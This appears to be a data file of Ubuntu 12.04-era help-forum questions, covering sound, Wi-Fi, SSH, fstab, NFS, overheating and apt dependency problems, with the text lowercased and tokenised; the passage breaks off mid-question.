143778	ubuntu 12.04 kernel 3.2.0-24 do not sound	before few days i install some updates to my ubuntu 12.04 . after those updates i have not any sound . when i use older kernel 3.2.0-23 all is ok i use i386 version ubuntu . petat @ mujlin : ~ $ aplay -l aplay : device_list:252 : žádné zvukové karty nenalezeny ... ( any sound card found ... ) but petat @ mujlin : ~ $ lspci -v [ ... ] 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) subsystem : giga-byte technology ga-ma770-ds3rev2.0 motherboard flags : bus master , slow devsel , latency 32 , irq 7 memory at fe024000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel modules : snd-hda-intel [ ... ] 01:05.1 audio device : advanced micro devices [ amd ] nee ati rs780 hdmi audio [ radeon hd 3000-3300 series ] subsystem : advanced micro devices [ amd ] nee ati rs780 hdmi audio [ radeon hd 3000-3300 series ] flags : bus master , fast devsel , latency 0 , irq 3 memory at fdffc000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel modules : snd-hda-intel and petat @ mujlin : ~ $ bash alsa-info.sh -- stdout /sbin/alsactl : save_state:1580 : no soundcards found ... cat : /tmp/alsa-info.vcc4whbrla/alsactl.tmp : no such file or directory upload=true & script=true & cardinfo= ! ! # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ! ! alsa information script v 0.4.60 ! ! # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ! ! script ran on : tue may 29 16:45:06 utc 2012 ! ! linux distribution ! ! -- -- -- -- -- -- -- -- -- ubuntu 12.04 lts \n \l distrib_id=ubuntu distrib_description= '' ubuntu 12.04 lts '' ! ! dmi information ! ! -- -- -- -- -- -- -- - manufacturer : gigabyte technology co. , ltd . product name : ga-ma78gm-s2h product version : ! ! kernel information ! ! -- -- -- -- -- -- -- -- -- kernel release : 3.2.0-24-generic-pae operating system : gnu/linux architecture : i686 processor : athlon smp enabled : yes ! ! alsa version ! ! -- -- -- -- -- -- driver version : 1.0.24 library version : 1.0.25 utilities version : 1.0.25 ! ! loaded alsa modules ! ! -- -- -- -- -- -- -- -- -- - ! ! sound servers on this system ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- pulseaudio : installed - yes ( /usr/bin/pulseaudio ) running - yes ! ! soundcards recognised by alsa ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- - no soundcards -- - ! ! pci soundcards installed in the system ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) 01:05.1 audio device : advanced micro devices [ amd ] nee ati rs780 hdmi audio [ radeon hd 3000-3300 series ] ! ! advanced information - pci vendor/device/subsystem id's ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 00:14.2 0403 : 1002:4383 subsystem : 1458 : a022 -- 01:05.1 0403 : 1002:960f subsystem : 1002:960f ! ! modprobe options ( sound related ) ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- snd-atiixp-modem : index=-2 snd-intel8x0m : index=-2 snd-via82xx-modem : index=-2 snd-usb-audio : index=-2 snd-usb-caiaq : index=-2 snd-usb-ua101 : index=-2 snd-usb-us122l : index=-2 snd-usb-usx2y : index=-2 snd-cmipci : mpu_port=0x330 fm_port=0x388 snd-pcsp : index=-2 snd-usb-audio : index=-2 snd_hda_intel : model=hp-dv6 snd_hda_intel : model=hp-dv6 snd_hda_intel : model=hp-dv6 snd-hda-intel : model=eapd probe_mask=1 position_fix=1 snd_hda_intel : model=hp-dv6 ! ! loaded sound module options ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- ! ! alsa device nodes ! ! -- -- -- -- -- -- -- -- - crw-rw -- -t+ 1 root audio 116 , 1 may 29 18:13 /dev/snd/seq crw-rw -- -t+ 1 root audio 116 , 33 may 29 18:13 /dev/snd/timer ! ! aplay/arecord output ! ! -- -- -- -- -- -- aplay aplay : device_list:252 : no soundcards found ... arecord arecord : device_list:252 : no soundcards found ... ! ! amixer output ! ! -- -- -- -- -- -- - ! ! alsactl output ! ! -- -- -- -- -- -- - -- startcollapse -- -- endcollapse -- ! ! all loaded modules ! ! -- -- -- -- -- -- -- -- -- module snd_seq_dummy snd_hrtimer nls_iso8859_1 nls_cp437 vfat fat pci_stub vboxpci vboxnetadp vboxnetflt vboxdrv bnep rfcomm bluetooth parport_pc ppdev binfmt_misc vesafb snd_hda_codec snd_hwdep snd_pcm snd_seq_midi snd_rawmidi usblp snd_seq_midi_event fglrx snd_seq snd_timer joydev snd_seq_device snd soundcore sp5100_tco snd_page_alloc shpchp wmi i2c_piix4 mac_hid psmouse k8temp serio_raw lp parport usbhid hid firewire_ohci 8139too firewire_core crc_itu_t 8139cp pata_atiixp r8169 usb_storage ! ! alsa/hda dmesg ! ! -- -- -- -- -- -- -- -- -- [ 13.048454 ] usbcore : registered new interface driver usblp [ 14.617938 ] snd_hda_intel : unknown symbol vga_default_device ( err 0 ) [ 14.618006 ] snd_hda_intel : unknown symbol vga_default_device ( err 0 ) [ 14.618900 ] snd_hda_intel : unknown symbol vga_default_device ( err 0 ) [ 14.619085 ] snd_hda_intel : unknown symbol vga_default_device ( err 0 ) [ 14.996659 ] type=1400 audit ( 1338308035.953:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=677 comm= '' apparmor_parser ''
143781	used purge command to remove java , it removed a lot more than java	i used this purge command sudo apt-get purge openjdk7* , however this uninstalled a lot of the software and my me menu has vanished . every time i install something there is a huge list of packages the system wants me to remove by using the command sudo apt-get autoremove . i looked trough these , and some were recently installed , but are recognized as orphaned packages . is there any way i can solve this , or do i have to format and install ubuntu again ? i am using ubuntu 12.04 lts x64 . here are pastebins of three relevant log files from my system : /var/log/dpkg.log /var/log/apt/history.log /var/log/apt/term.log
143782	wireless is disabled by hardware switch , lenovo b460	santos @ santos : ~ $ rfkill list 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no 3 : brcmwl-0 : wireless lan soft blocked : no hard blocked : yes santos @ santos : ~ $ *-network disabled description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth2 version : 01 serial : ac:81:12:22 : cb:38 width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 latency=0 multicast=yes wireless=ieee 802.11 resources : irq:17 memory : f2500000-f2503fff any solution ?
143783	how to remove the rounded menu items from a theme ?	i 've just spent quite a while theming ambiance to make it more flat and all around more to my taste , but i 've just come across a problem above my capabilities : rounded menuitems the menu on the panel have rounded top corners , i 'd like to have them squared , a la elementary , but without the effects on the side , since i 'm pursuing a flat theme . i 've been looking around in gtk.css and gtk-widgets.css but i ca n't seem to find it . any help would be greatly appreciated !
143784	ca n't set up public key ssh authentication	i have a fresh install of ubuntu 12.04 . i 'm trying to setup ssh public key authentication . unfortunately , it refuses to work . running the ssh client in verbose mode i can see that the public keys are being refused . ~/.ssh/authorized_keys exists and seems to have the correct permissions etc . what i would like to do is to read the sshd log to find out what it is complaining about . but i can not find where the sshd logs to on ubuntu 12.04 . i 've tried googling and checked /var/log/auth.log and /var/log/syslog and neither are showing sshd messages . where can i find the daemon logs to figure out what is going on ? sshd is set with logging syslogfacility auth loglevel verbose and /etc/rsyslog.d/50-default.conf reads : auth , authpriv . * /var/log/auth.log * . * ; auth , authpriv.none -/var/log/syslog but nothing shows up about sshd in those log files . also . no sshd process appears to be running if run ps xa | grep sshd . is that normal ? it certainly accepts password connections .
143785	what port is tomcat 6 running on	i have installed a package called opengeo-suite which installs tomcat 6 if it is not installed . now i have apache 2.2 running on port 8080 . i wish to find out on which port is the tomcat 6 running on ? what is the command to find that out ? edit also how do i identify whether it is up and running ?
143787	/boot on the installation process ?	can someone tell me under what circumstances is /boot accessed ? is this when ubuntu is installed , or before the installation process ( or both ? ) also , is this ubuntu behaviour similar for other flavours of linux ? is boot accessed every time the system starts up ? are there any significant files which are only accessed upon installation and not during a normal startup ?
143791	notebook dell inspiron n5110 overheating after installing ubuntu 12.04	i am a windows 7 user and decided to install ubuntu 12.04 on my notebook dell inspiron n5110 and when the grub loads with the menu list , the fan starts speeding up . if i choose windows , the fan is noiseless ; but , if i choose ubuntu it continues speeding up and overheating . if there is a solution for this . i wonder if someone could spend some time helping me out because i have just bought this notebook because it is in the list of certified hardware : http : //www.ubuntu.com/certification/hardware/201012-6931/ so you linux wonderful guys help !
143796	how to determine hardware ?	is there a command to detect the type of processor , type of graphics card , type of hard drive , just the basic hardware my computer is running ? i 'm running 12.04 .
143802	new avd not creating properly in android	i have copied android-sdk-linux folder from one pc to another pc , and installed eclipse and set appropriate paths ( both tools and platform-tools ) but i can not create any avd . when i try to create new avd from android virtual device manager , it only show this error message in console when i click new avd . [ 2012-05-29 23:29:27 - sdk manager ] failed to create the sd card . [ 2012-05-29 23:29:27 - sdk manager ] failed to create sdcard in the avd folder . i put my android-sdk-linux folder in /home/dharma/android-sdk-linux on my pc , i did n't find home/username/.android/avd . so what can i do to run my app in the emulator .
143803	unity 3d hangs after power blackout	unity 3d was working just fine till we had a blackout in the area ( i have not yet bought a ups : ( ) . i tried the solutions here , but it does not help . i tried issuing a unity -- reset and it gives me this output : http : //pastebin.com/uw83w5cg what seems to be important ( to me ) from that log is this part : ( compiz:6510 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed error 2012-05-29 21:50:41 unity.launcher.trashlaunchericon trashlaunchericon.cpp:62 could not create file monitor for trash uri : operation not supported for the time being , i can use unity-2d , but i would like the 3d to work as well . can you please help ? edit : output when issuing $ unity -- replace : http : //pastebin.com/sbcpbyrt ( compiz:2811 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed error 2012-06-01 20:21:24 unity.launcher.trashlaunchericon trashlaunchericon.cpp:62 could not create file monitor for trash uri : operation not supported initializing unityshell options ... done warn 2012-06-01 20:21:25 unity.screeneffectframebufferobject screeneffectframebufferobject.cpp:167 unsupported internal format segmentation fault ( core dumped )
143804	disable automount notification for usb-drive	i 'm using ubuntu 12.04 with gnome shell and on my computer i have a usb-drive ( with two partitions ) that are always plugged in . when i login there is always a notification that they have been mounted . how do i remove that notification ! ?
143808	why does ubuntu trigger thermal protection shutdowns on my dell laptop ?	i have been using windows ( vista and 7 ) for quite some time on my dell studio 1555 and i have never experienced overheating problems ( even when rendering videos etc . ) but as soon as i turn on my laptop with ubuntu , the fan starts spinning at full speed and the temperature starts rising steadily . the temperature rises to a point where the laptop shuts down due to too much heat ! here are some additional details : laptop model : dell studio 1555 bios version : a13 ( latest , as per dell website ) graphic card : ati radeon hd 4570 i did a clean install of ubuntu 12.04 and have upgraded and updated everything , and the problem still persists . this seems to be a common problem with many dell laptops but i have not been able to find a proper solution ...
143814	how to create sigquit as command in the command line ?	i am a total noob in shell scripting . i am creating .sh file to make some multiple commands , but my problem is that the last command is an executable file that after excuting it stays open and the processes keep running in the terminal until i close the terminal or press ctrl+ c or \ . i want to kill this processes or quit the terminal which will also kill the process automatically while running the .sh file . this is the .sh file below . excuse my question if it was simple . # ! /usr/bin/env bash cd ./var/www/testgraduationproject1/public/hume2compiler/bin/ export path= $ path : `pwd` humec -lotsaspace tails.hume ; ./tails > hello.txt //i have tried this two commands but they just stop the loading of process in terminal but without closing the terminal or the process itself . killall tails stty -a | grep inter
143815	how can i give a program writing access to a directory ?	there 's a program called imagemagick that can edit images . it can save files to my home folder with out issues . it wo n't save images to a folder /var/www/thumb_nails/ edit : it does work if i execute the script i have the command in . it just wont work when apache2 uses the script ... very strange ...
143819	how do i configure my static dns in interfaces ?	i am using ubuntu 12.04 . my /etc/network/interfaces file consists of : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.1.58 gateway 192.168.1.1 network 192.168.1.0 broadcast 192.168.1.255 dns-nameservers 66.212.63.228 66.212.48.10 i ran the command : /etc/init.d/networking restart which responded with : *running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces *reconfiguring network interfaces ... rtnetlink answers : file exists failed to bring up eth0 [ ok ] next i ran ping google.com and received : ping : unknown host google.com i am not sure if my interfaces refreshed . how do i properly configure my network with my static dns addresses ?
143820	ca n't install gvim	i 've installed gvim and synaptic package manager on 12.04 , gvim had a warning each time i ran it from terminal . so i removed it and tried to install again but came with the following error from software center : the following packages have unmet dependencies : vim-gnome : depends : vim-gui-common ( = 2:7.3.429-2ubuntu2 ) but 2:7.3.429-2ubuntu2.1 is to be installed depends : vim-common ( = 2:7.3.429-2ubuntu2 ) but 2:7.3.429-2ubuntu2.1 is to be installed depends : vim-runtime ( = 2:7.3.429-2ubuntu2 ) but 2:7.3.429-2ubuntu2.1 is to be installed i disabled repositories from software center and just enabled the `` main '' and the error is still present , software center crashes sometimes too . what should i do so ?
143826	wireless network not showing up	my other laptop is in for repairs so im using my old one now , running ubuntu 12.o4 , i have the broadcom installed but it is not showing any wireless networks not a wireless connection , using inspiron 152o , was wondering if anyone can help ?
143830	how to use a unity lens without a reboot/logout	how can i use a lens like the unity-news-lens without a reboot or logout ?
143831	lubuntu 12.04 random lock ups - next steps ?	setup lubuntu 12.04 , xp dual boot ati rs480 graphics problem i get random lockups about once every 3 hours or so . symptoms pc hangs with ( typically ) a small bar-code style square in top left quadrant of the screen or else a totally white screen . nothing entered at the keyboard causes any response ( alt sysreq b etc ) power off/on is necessary to get going again has happened with both firefox and chromium , so ca n't blame the browser can not ping or ssh to the pc from another device on the same lan when it happens nothing is output on netconsole ( on the same lan ) at the moment of the lockup xp never locks up so it ca n't be bad memory
143838	how do i restart cinnamon from the tty ?	i installed cinnamon on my ubuntu 12.04 , and it works well , but sometimes it just freezes for no reason . i can move my mouse but ca n't click on anything . so i want to restart cinnamon from tty , like i used to do with gnome shell . how do i do that ? i tried killall cinnamon and nothing happened . then i tried export display=:0.0 , cinnamon -- replace and still nothing . i guess the command cinnamon is not valid . i do n't want to restart the whole x server because then all of my windows will get closed . i just want to restart the window manager cause i believe it is causing the problem .
143840	how do i install dwm on ubuntu	i would like to know how i can easily install dwm window manager on ubuntu . it would not matter if you only know how to install awesome window manager as they are alike and i like them both . it does not matter if you know through a ppa or how to install through terminal .
143841	password on keyring ubuntu 12.04	i have changed my settings to not use a password for my account . i can log in okay , but i ca n't perform any updates . every time i try , it asks me for a password which i no longer have . there are two more questions : is it possible to make gnome-keyring not appear when there is no password ? what is the original password to unlock gnome-keyring on the live dvd / usb ? i find it annoying on test environments when i do not know the password
143844	how do i install slim login manager ?	i would like to know the easiest and most straight forward way to to install the slim login manager . hopefully through terminal , but i am not fussy how i install it correctly as long as it works . i am using ubuntu 12.04 and slim login manager is a very lightweight login manager , with some connections to both awesome and dwm window manager .
143848	kernel name has changed ?	i am just looking through a log of system activity in messages . the name of the kernel has changed shortly after the installation : oct 10 09:10:12 keira rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 4.5.3 '' x-pid= '' 570 '' x-info= '' http : //www.rsyslog.com '' ] exiting on signal 15 . oct 11 15:18:42 leopold kernel : imklog 4.6.4 , log source = /proc/kmsg started . oct 11 15:18:62 leopold rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 4.5.3 '' x-pid= '' 571 '' x-info= '' http : //www.rsyslog.com '' ] ( re ) start what could cause this ? is the kernel just named after the computer name and the user has changed the computer name ? i think the change has just taken place after the os was installed from a usb stick .
143851	as unity in relocating intelligently in ubuntu 12.04 ?	unity in ubuntu 12.04 does not give option to intelligently ( panel visible in desktop , but if you leave any window is hidden ) as you can put back that way ?
143862	how can i show all kernels in the grub2 menu , ie disable submenu ( `` previous linux versions '' ) ?	is there an easy way to disable grub2 new submenu structure ? i 'd like to have back the old structure ( each option as a menuentry ) where each kernel is visible and selectable on the fly . i 've already tried this solution , to no avail . and this is the most promising solution i 've found until now . i did n't try it ( i 'll test it tomorrow ) but i was wondering if there is a better way . thanks for any help .
143867	how do i remove windows on ubuntu partition ?	i 'm new to ubuntu , i have an old pc and wanted to try it out . installed it using the windows installer and it created its own partition . i would like to uninstall windows and run this as the sole os . can anyone help ?
143874	keyboard stops working on a dell inspiron 7110	title says it all . do note that the keyboard stops randomly , and i never had problems during the install or boot or such . i wrote this w/ my on-screen keyboard . it has no function keys however , so the solution presented here would n't be applicable . i also naturally would n't want to have to relog every time this happens . i can access my console fine w/ my on-screen keybd , so terminal commands i can do . my laptop is a dell inspiron 7110
143875	problem logging in even though password is accepted	i am logged in as user_a . i created another account user_b with root privileges using the following steps : sudo -s useradd user_b passwd user_b > sum_passwd sudo adduser user_b admin after which i rebooted and tried to login as user_b but after typing the password , i see momentary darkness and then the login screen again . this does not happen if i try to type some incorrect password , as i am prompted immediately . i can login just fine to the guest_account and user_a but the newly created user_b is causing problems . how do i fix this ?
143876	evince default dual view	i like to use dual view for some documents in evince . recently , evince caught up up to this , and now it opens every single document in dual view . on the flip side , i prefer to use single view for most documents so this is pretty annoying . is there a way to revert the change ? i do not see any default settings corresponding to the indicated behavior .
143878	could windows interfere with the installation of ubuntu through a live cd ?	when i try to use a live cd , my dell xps 14z will not read the disk and skips to booting windows , i 've had previous questions discussing this but everything i have tried never works . i 'm almost absolutely sure that i am not burning the cd wrong , because windows recognizes it as a ubuntu install disc . but when i boot from cd drive it never reads the cd ! i used to have a wubi installation , but i uninstalled it , when i try to reinstall it i get an error . i forgot what it is but i will post it later in a comment . i 've tried to use the boot cd helper ( whatever it 's called ) but i get an error there too , again i 'll post it in the comments . also , i have had absolutely no problem in the past installing ubuntu on other computers . the first thing i did when i tried to install ubuntu is to make sure the priority was set to boot from cd drive . so that is n't the problem . could windows be interfering with the installation of ubuntu ? should i do a clean install of windows then try ubuntu ?
143886	asus 1215n 12.04 overheating	this is the 3rd time i install ubuntu . and this time it 's 12.04 . i 've been going back to windows , but keep on coming back ! but i just got this one problem , my asus eeepc 1215n keeps on overheating when i run ubuntu ! i 've seen that this is a common problem and therefore thought it might be a piece of cake to fix it , but the more i read about it , the more confused i get ! i 'm a fairly novice linux user and would really appreciate if someone could help me out with a step by step instructions to how to fix this ! ( even include what i 'm supposed to write in terminal ) . what i 've understood from most posts i 've read is that the nvidia ion2 driver needs to be disabled ? i guess it 's because it just goes haywire even though it 's not being used ... right ? will this solve my overheating problems ? i 'm sorry for this being a repost , but like i said , this is my 3rd time around and all my searching really has n't got me any further down the road !
143889	unable to unpack libgdal	i am trying to install opengeo-suite and it seems due to some reason i am unable to install due to the libgdal unable to be unpacked . this is the error i get everytime i execute apt-get install opengeo-suite unpacking libgdal ( from ... /libgdal_1.8.1-1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libgdal_1.8.1-1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/gdal-config ' , which is also in package libgdal-dev 1.9.0-1~exp5p1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) ... ... unpacking opengeo-suite ( from ... /opengeo-suite_2.5_amd64.deb ) ... processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/libgdal_1.8.1-1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how do i solve this error ?
143891	computer shut off mid-update and now i ca n't update my computer	every time i try to update i get the following error , can someone help me ?
143893	fan speed high since upgrade to 12.04	since i have updated to 12.04 lts my desktop pc 's fan runs permanently with high speed and is annoyingly noisy . cpu temperature is low . here is what the sensors command gets me : nouveau-pci-0400 adapter : pci adapter temp1 : +48.0°c ( high = +100.0°c , crit = +115.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +39.0°c ( high = +82.0°c , crit = +100.0°c ) core 1 : +40.0°c ( high = +82.0°c , crit = +100.0°c ) core 2 : +37.0°c ( high = +82.0°c , crit = +100.0°c ) core 3 : +44.0°c ( high = +82.0°c , crit = +100.0°c ) f8000-isa-0a00 adapter : isa adapter +3.3v : +3.34 v 3vsb : +3.38 v vbat : +3.23 v fan1 : 1675 rpm fan2 : 959 rpm fan3 : 0 rpm alarm fan4 : 0 rpm temp1 : +42.0°c ( high = +70.0°c , hyst = +60.0°c ) temp2 : +25.0°c ( high = +100.0°c , hyst = +85.0°c ) temp3 : +24.0°c ( high = +100.0°c , hyst = +85.0°c ) same issue of noisy fan has been noted in dell 1555 after upgrade to 12.04 with output of sensors command as below : acpitz-virtual-0 adapter : virtual device temp1 : +51.0°c ( crit = +100.0°c ) temp2 : +59.0°c ( crit = +100.0°c ) temp3 : +79.0°c ( crit = +100.0°c ) radeon-pci-0100 adapter : pci adapter temp1 : +80.0°c is there a way to figure out which application is causing it ?
143899	cron reinstallation	can cron be reinstalled ? if so , how to take cron job backups created by system and applications like postfix , apache etc. , now after taking backups how to reinstall cron ?
143904	how to install ia32-libs on 12.04 lts ( 32 bit )	i am trying to install ia32-libs on ubuntu 12.04 lts ( x86 ) . i enabled all the repository sources but i 'm receiving the error message below : ~ $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'ia32-libs ' has no installation candidate output of sudo apt-cache policy ia32-libs ia32-libs : installed : ( none ) candidate : ( none ) version table : output of cat /etc/apt/sources.list ( removed similar hyperlinks ) deb http : //archive.ubuntu.com/ubuntu/ precise restricted main multiverse universe deb-src archive.ubuntu.com/ubuntu/ precise restricted main multiverse universe # added by software-properties deb security.ubuntu.com/ubuntu/ precise-security main restricted universe multiverse deb-src security.ubuntu.com/ubuntu/ precise-security main restricted universe multiverse # added by software-properties deb archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse deb-src archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse # added by software-properties
143905	permissions for mounted nfs share ?	i have two linux boxes , one is ubuntu 11.10 that i have an nfs share set up with , and the other is ubuntu 12.04 that i have mounted the nfs share at . /etc/exports on the 11.10 box looks like : /share 192.168.1.0/255.255.255.0 ( rw , all_squash , insecure ) and the 12.04 box /etc/fstab looks like : 192.168.1.10 : /share /import nfs rw , hard , intr 0 0 the share mounts fine , and i can see the files . the problem is that i can not create new files in the mounted share . $ mkdir /import/test mkdir : can not create directory `/import/test ' : read-only file system i am pretty sure it is something on the 12.04 box that is not set right , since i can mount the nfs mount on my mac and can create folders and files . so how to allow write access to the nfs share on the 12.04 box ?
143907	can not get dual monitor setup working in ubuntu 12.04 : lg flatron ips235	i am trying to use this monitor with my laptop ( hp dv7 ) which i dual boot into a fairly new install of 12.04 precise pangolin . in windows 7 , this monitor `` just works '' right out of the box . i have it connected to my computer via hdmi and d-sub cables . in ubuntu , the system seems to recognize the monitor just fine ( i can tweak it in my nvidia settings , although `` display '' in preferences reads just one large monitor ) . i can even see my mouse get `` swallowed up '' and go off screen ( towards the other monitor ) when i push it past the application tray on the left . but : nothing is displayed on this monitor , and nothing i do seems to work to get it to display . my xorg.conf : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ zirconium ) fri mar 30 13:43:34 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` lg electronics ips235 '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 230m '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` metamodes '' `` crt : nvidia-auto-select +0+0 , dfp-0 : nvidia-auto-select +1920+0 '' subsection `` display '' depth 24 endsubsection endsection when i try to run xrandr -- auto , i get an error : xrandr : failed to get size of gamma for output default any ideas ? i 'm up to date on proprietary drivers . thank you ! !
143908	bad fstab , ca n't seem to fix	edit : another thing that compounded/compounds the problem is that pysdm lets you add spaces in drive mount points , which i am pretty sure are not supported . edit : so . i downloaded a program that is supposed to auto-configure ntfs programs , and it seems to have automatically put in those uuids for me ! the problem is that i now seem to have two entries for each drive , and it 's rather cluttered . ( see below ) sorry to be another one of those annoying people posting fstabs left and right and saying , `` help me ! '' but i 'm really stumped . so i was using pysdm ( the gui frontend is `` storage device manager '' ) and i realised something awful . it works fine to set new partition entries , but it wo n't change existing entries , only add new ones . that means that if i want to change the mounted name of sda6 from a to b it makes an entirely new entry ! ! ! so anyways , i went and cleaned out my fstab , with one entry for each partition and the proper options ( the ntfs stuff , file permissions ) . it still asks me what to do ( skip , retry , panic , manual , whatever ) once during startup - apparently it 's looking for another partition that 's already mounted or does n't exist . could the problem be something to do with my mtab ? i have no clue ; i only got into linux like 6 months ago . my fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # # # / was on /dev/sda8 during installation # swap was on /dev/sda6 during installation # < file system > < mount point > < type > < options > < dump > < pass > uuid=efc87ac0-daac-4a32-9a85-ea57beff0e28 / ext4 defaults 0 1 proc /proc proc nodev , noexec , nosuid 0 0 /dev/sda6 /media/swap swap sw 0 0 /dev/sda1 /media/windows 7 ntfs nls=iso8859-1 , users , noauto 0 0 /dev/sda2 /media/boot ext2 users , noauto 0 0 /dev/sda3 /media/acer ntfs nls=iso8859-1 , users , noauto 0 0 /dev/sda5 /media/windows # 2 ntfs nls=iso8859-1 , users , noauto 0 0 /dev/sda7 /media/fedora ext4 users , noauto 0 0 /dev/sda9 /media/storage ext4 users 0 0 regarding the new config : i now , unfortunately , get this : also , whenever i try to mount a ntfs partition not as root , i get this : my new fstab , for whatever reason , does n't seem to want to stay in blockquote without becoming headers and such , so it put it here .
143914	apt-get fails to upgrade , install , remove etc	i upgraded from 11.10 to 12.04 , had no issues that i noticed . recently tried to install something via software center , but it was throwing errors . changed to trying to sudo apt-get install instead but again no luck . i 've genuinely tried as much as i know to fix this , but i ca n't so i figured i 'd ask here . i 've done sudo apt-get update successfully but sudo apt-get upgrade failed with ... you might want to run âapt-get -f installâ to correct these . the following packages have unmet dependencies . ia32-libs-multiarch : i386 : depends : libqtcore4 : i386 but it is not installed libqt4-dbus : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not installed libqt4-declarative : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not installed libqt4-designer : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not installed libqt4-network : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not installed libqt4-opengl : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not installed libqt4-qt3support : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not installed libqt4-script : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not installed libqt4-scripttools : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not installed libqt4-sql : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not installed libqt4-sql-mysql : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not installed libqt4-svg : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not installed libqt4-test : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not installed libqt4-xml : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not installed libqt4-xmlpatterns : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not installed libqtgui4 : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not installed libqtwebkit4 : i386 : depends : libqtcore4 : i386 ( > = 4:4.8.0~ ) but it is not installed libssl1.0.0 : breaks : libssl1.0.0 : i386 ( ! = 1.0.1-4ubuntu5.2 ) but 1.0.0e-2ubuntu4.6 is installed libssl1.0.0 : i386 : breaks : libssl1.0.0 ( ! = 1.0.0e-2ubuntu4.6 ) but 1.0.1-4ubuntu5.2 is installed e : unmet dependencies . try using -f. using sudo apt-get -f install ... the following packages were automatically installed and are no longer required : libgtkmm-2.4-1c2a libgtkhtml3.14-19 libglade2-0 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libqtcore4 : i386 libssl1.0.0 : i386 the following new packages will be installed libqtcore4 : i386 the following packages will be upgraded : libssl1.0.0 : i386 1 upgraded , 1 newly installed , 0 to remove and 33 not upgraded . 20 not fully installed or removed . need to get 0 b/3,063 kb of archives . after this operation , 9,044 kb of additional disk space will be used . do you want to continue [ y/n ] ? y e : internal error , no file name for libssl1.0.0 i 've tried sudo apt-get remove libssl1.0.0 and sudo apt-get remove libssl1.0.0 : i386 reading package lists ... done building dependency tree reading 